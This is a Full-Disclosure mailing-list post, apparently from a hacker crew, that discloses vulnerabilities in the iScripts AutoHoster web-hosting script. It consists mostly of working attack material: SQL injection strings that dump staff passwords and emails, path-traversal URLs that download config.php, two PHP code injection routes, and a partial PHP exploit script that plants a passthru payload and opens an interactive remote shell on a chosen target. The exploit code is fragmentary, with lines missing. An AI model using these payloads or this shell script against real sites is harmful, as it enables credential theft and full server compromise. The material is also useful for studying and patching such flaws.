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[Full-disclosure] iscripts autohoster , multiple vulns / php code injection exploit

Hi guys
script is premium but can be downloaded via
publish it under the name of i-Hmx
thanks :)
[+] iScripts AutoHoster
[+] Multiple vulnerabilities , PHP Code injection Exploit
[+] Author : i-Hmx
[+] n0p1337@xxxxxxxxx
[+] sec4ever.com , 1337s.cc

I.Sql Injection Vuln

Table name : submit=faris&cmbdomain=i-Hmx' /*!1337union all select 
0x6661726973,(select distinct concat(0x7e,0x27,unhex(Hex(cast(table_name as 
char))),0x27,0x7e) from information_schema.tables where 
table_schema=database()limit 53,1),0x723078 and 'faris'='1337
Staff number : submit=faris&cmbdomain=i-Hmx' /*!1337union all select 
0x6661726973,(select concat(0x3e3e,count(*),0x3c3c) from 
autohoster_staffs),0x723078 and 'faris'='1337
Staff Data : submit=faris&cmbdomain=i-Hmx' /*!1337union all select 
0x6661726973,(select concat(0x3e3e,unhex(Hex(cast(vPassword as 
char))),0x5e,unhex(Hex(cast(vLogin as char))),0x5e,unhex(Hex(cast(vMail as 
char))),0x3c3c) from autohoster_staffs limit 0,1) ,0x723078 and 'faris'='1337

The same 

II.Time based Blind Injection
Post : submit=faris&cmbdomain=%Inject_Here%


Little note : Both might not work if magic_quotes_gps = on :(
Nop , don't be so dramatic 
am here to show u the full movie 
not just the sad part ;)
Just keep reading

III.Local File Disclosure
include_once "includes/session.php";
include_once "includes/function.php";
$templateid             = $_GET['tmpid'];
$type                   = $_GET['type'];
if ($type == "home") {
  $imagename    = "homepageimage.jpg";
} else if($type == "sub") {
  $imagename    = "subpageimage.jpg";
} else {
  $imagename    = "thumpnail.jpg";
Hmmm , we can cancel the imagename value via the null byte %00
[+] Exploit : 

/admin/downloadfile.php > probably injected by the Guy who nulled the script 
(thank u any way ;p)
$filename       = urldecode($_GET['fname']);
no need to cancel any thing , just beat it bro ;)
[+] Exploit : /admin/downloadfile.php?fname=../includes/config.php

  header('Content-Description: File Transfer'); 
  header('Content-Type: application/force-download'); 
  header('Content-Length: ' . filesize($filename)); 
  header('Content-Disposition: attachment; filename=' . basename($filename)); 
[+] Exploit : /support/admin/csvdownload.php?id=../../includes/config.php%00

IV.Directory tr. vuln
Just light sandwitch before the fatty food :))

V.PHP Code Injection Vuln.
Here come the King :D

        $tldselected = $HTTP_POST_VARS[ "tldselect" ];

        $tldcount = count ($tldselected);
        for ($j = 0; $j < $tldcount; $j++)
                        $tldList .= "<option <?php if ( \$cTld==\"" . 
$tldselected[$j] . "\" ) { echo \"selected\"; } ?>>" . $tldselected[$j] . 
                        $tldHoldList .= "\$" . str_replace(".", "", 
$tldselected[$j]) . "= 1;\n";

        //set up TLD list
        if ($HTTP_POST_VARS[ "tldsetup" ] == 1 or $HTTP_POST_VARS[ "original" ] 
== 1) {         
                $tldfile = fopen("./tldListOne.php", "w");
                fwrite($tldfile, "<select name=\"tld\">\n" . $tldList . 
                $tldHoldfile = fopen("./tldHoldList.php", "w");
                fwrite($tldHoldfile, "<?php\n" . $tldHoldList . "?>");
oOps , what should we do yar?
 so simple :)
 just post these parameters to /setup/TLDSetup.php
 Damn simple :)
 now just go to 
 Enter ur base64 php code as value for the parameter fa
 post parameter : fa=cGhwaW5mbygpOw==
 this will eval phpinfo(); , u can replace it by fopening ur own php file
 It's working , But magic_quotes_gpc will fu#* it up :(
 Need cleaner file???
 then post these parameters at : /setup/TLDSetup.php
 Post : 
 Now ur eval code can be executed at /setup/tldHoldList.php
 That's much better , huh?
 No quotes , let magic_quotes_gpc suffer ;)

if ($_POST["btnSubmit"] == "Create Custom Form") {
    $message = "";
    $txtEmailAddress = $_POST["txtEmailAddress"];//the form will be mailed to 
this email address on submission
    $txtPageName = $_POST["txtPageName"];//the actual page name
    $txtPageDisplayName = $_POST["txtPageDisplayName"];//for display in links
    $txtPageHeading = $_POST["txtPageHeading"];//the heading of the page
    $formelements = $_POST["formelements"];//holds the form elements to be 
embedded in the page

    $formstart = "<table cellspacing='2' cellpadding='2' width='100%' 
border='0'><tr><td align='center'>" . $txtPageHeading . "</td></tr><tr><td>";

    $formend = "</td></tr></table>";

    $formtext = $formstart . $formelements . $formend;

    if ($message != "") {
        $message = "<br>Please correct the following errors to continue!" . 
    if ($message == "") {//if no error, proceed with creating page, inserting 
to database etc
        $sql = "SELECT sm.vlinks, sm.vsub_sitelinks, 
tm.vlink_separator,tm.vsublink_separator,tm.vlink_type,tm.vsublink_type FROM " 
. $sitemaster . " sm INNER JOIN ".TABLE_PREFIX."template_mast tm ON 
sm.ntemplate_id = tm.ntemplate_mast ";
        $sql .= " WHERE sm." . $siteidfield . "  = '" . addslashes($siteid) . 
        // echo $sql;
        $res = mysql_query($sql);
        if (mysql_num_rows($res) != 0) {
            $row = mysql_fetch_array($res);
            $links = $row["vlinks"];
            $sublinks = $row["vsub_sitelinks"];
            $linkseparator = $row["vlink_separator"];
            $sublinkseparator = $row["vsublink_separator"];
            $linktype = $row["vlink_type"];
            $sublinktype = $row["vsublink_type"];
            $pagelink = "<a class=anchor1 href='./" . $txtPageName . "'>" . 
$txtPageDisplayName . "</a>";
            if ($linktype == "horizontal") {
                $newlink = $links . $linkseparator . $pagelink;
            } else if ($linktype == "vertical") {
                $newlink = $links . $linkseparator . $pagelink . "<br>";

            if ($sublinktype == "horizontal") {
                $newsublink = $sublinks . $sublinkseparator . $pagelink;
            } else if ($sublinktype == "vertical") {
                $newsublink = $sublinks . $sublinkseparator . $pagelink . 

            if ($links != "") {
                $sql = "UPDATE " . $sitemaster . " SET vlinks = '" . 
addslashes($newlink) . "', vsub_sitelinks='" . addslashes($newsublink) . "' 
WHERE " . $siteidfield . " = '" . addslashes($siteid) . "' ";
                mysql_query($sql);//adding links to database
                $pagename = $txtPageDisplayName;
                $filename = $txtPageName;
                $pagetitle = $txtPageDisplayName;
                $pagetype = "custom";
                $type = "simple";

                $sql2 = "INSERT INTO " . $sitepagetable . "(" . $siteidfield . 
", vpage_name,vpage_title,vpage_type,vtype) VALUES ('" . addslashes($siteid) . 
"','" . addslashes($pagename) . "','" . addslashes($pagetitle) . "','" . 
addslashes($pagetype) . "','" . addslashes($type) . "') ";
                mysql_query($sql2); //adding the new page to database

                $newfilename = $sitefoldername . "/" . $filename;
                if ($sitepagesfoldername != "") {//if it is a temp site(not 
completed), then create a file in the sitepages folder also
                    $newsitepagefilename = $sitepagesfoldername . "/" . 
                    $fp1 = fopen($newsitepagefilename, "w+");
                    fwrite($fp1, $formtext);
 So , all we need  is valid authorized siteid :)
 it's simple
 Make new site
 Go to Editing You site
   Link will be like : 
   tempsiteid=1 > that's what we need
 now time for injection :)
  Go to : websitebuilder/createcustom.php
  Post parameters : siteid=1&btnSubmit=Create Custom 
Form&txtPageName=faris.php&formelements=<? phpinfo(); ?>
  Damn obvious , hah ;)
  Injected file is located at  : /websitebuilder/workarea/tempsites/1/faris.php

Well , 
this fool wasted me abt 80 mins  :|

print "\n+-----------------------------+\n";
print "|     iScripts AutoHoster     |\n";
print "| PHP Code injection By i-Hmx |\n";
print "|      n0p1337@xxxxxxxxx      |\n";
print "|   sec4ever.com , 1337s.cc   |\n";
print "+-----------------------------+\n";
echo "\n| Enter Target [http://SITE.COM/PATH/] # ";
function kastr($string, $start, $end){
                $string = " ".$string;
                $ini = strpos($string,$start);
                if ($ini == 0) return "";
                $ini += strlen($start);
                $len = strpos($string,$end,$ini) - $ini;
                return substr($string,$ini,$len);
function faget($url,$post){
curl_setopt($curl, CURLOPT_POSTFIELDS,$post);
curl_setopt($curl, CURLOPT_COOKIEFILE, '/'); 
curl_setopt($curl, CURLOPT_COOKIEJAR, '/'); 
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($curl, CURLOPT_HEADER, false); 
return $exec;
echo "\n| Injecting Payload\n";

if (!preg_match("/passthru()/", faget($target."/setup/tldHoldList.php", "")))
die("\n[-] Exploit Failed\n");
print "| sec4ever shell online\n";
    print "\ni-Hmx@$myh# ";
        die("\n[*] Terminating\n");
    $fadata = faget($target."/setup/tldHoldList.php?fa=$fax","");
    print $fadata;
Msg for *** ******
Don't sell what's not belonging to you :)
have a good day
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